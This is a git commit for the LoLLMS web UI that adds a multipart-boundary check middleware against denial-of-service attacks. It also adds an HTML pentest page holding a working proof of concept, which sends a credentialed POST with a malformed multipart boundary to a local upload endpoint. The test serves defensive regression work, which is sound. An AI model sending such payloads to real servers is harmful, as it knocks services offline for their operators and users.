Added multipart boundary check to prevent from DOS attacks

2024-12-19 20:37:51 +00:00 · 2024-09-11 23:11:00 +02:00 · 2024-09-11 23:11:00 +02:00 · 483431bb20
commit 483431bb20
parent 9bd35deb01
3 changed files with 34 additions and 2 deletions
--- a/app.py
+++ b/app.py
@ -89,7 +89,7 @@ from lollms.app import LollmsApplication
 from lollms.paths import LollmsPaths
 from lollms.main_config import LOLLMSConfig
 from lollms.utilities import trace_exception
-from lollms.security import sanitize_path
+from lollms.security import sanitize_path, MultipartBoundaryCheck
 from lollms_webui import LOLLMSWebUI
 from pathlib import Path
 from ascii_colors import ASCIIColors
@ -124,6 +124,9 @@ def get_ip_addresses():
 app = FastAPI(title="LoLLMS", description="This is the LoLLMS-Webui API documentation")


+# Add the MultipartBoundaryCheck middleware
+app.add_middleware(MultipartBoundaryCheck)
+

 #app.mount("/socket.io", StaticFiles(directory="path/to/socketio.js"))

--- a/2
+++ b/2
@ -1 +1 @@
-Subproject commit 39ca9834901b2dc57fb781a6d0aab787afb0491a
+Subproject commit ab739e640f3382860a491a156ad1d319c01bbfd6
--- a/tests/pentests/multipart_dos/dos_attack.html
+++ b/tests/pentests/multipart_dos/dos_attack.html
@ -0,0 +1,29 @@
+<html>
+  <body>
+  <script>history.pushState('', '', '/')</script>
+    <script>
+      function submitRequest() {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http://localhost:9600/upload_app", true);
+        xhr.setRequestHeader("Accept", "application/json, text/plain, */*");
+        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
+        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------30672353603658029961121811124");
+        xhr.withCredentials = true;
+        var body = "\r\n" + 
+          "-----------------------------30672353603658029961121811124\r\n" + 
+          "Content-Disposition: form-data; name=\"file\"; filename=\"M1F1-Alaw-AFsp.wav\"\r\n" + 
+          "Content-Type: audio/wav\r\n" + 
+          "\r\n" + 
+          "dsadsdsa\r\n" + 
+          "-----------------------------30672353603658029961121811124--Random-Characters-Or-Integers-Start-From-H-re9786452315697846512978645231569784651297864523156978465129786452315697846512978645231569784651297864523156978465129786452315697846512978645231569784651297864523156978465129786452";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i); 
+        xhr.send(new Blob([aBody]));
+      }
+    </script>
+    <form action="#">
+      <input type="button" value="Submit request" onclick="submitRequest();" />
+    </form>
+  </body>
+</html>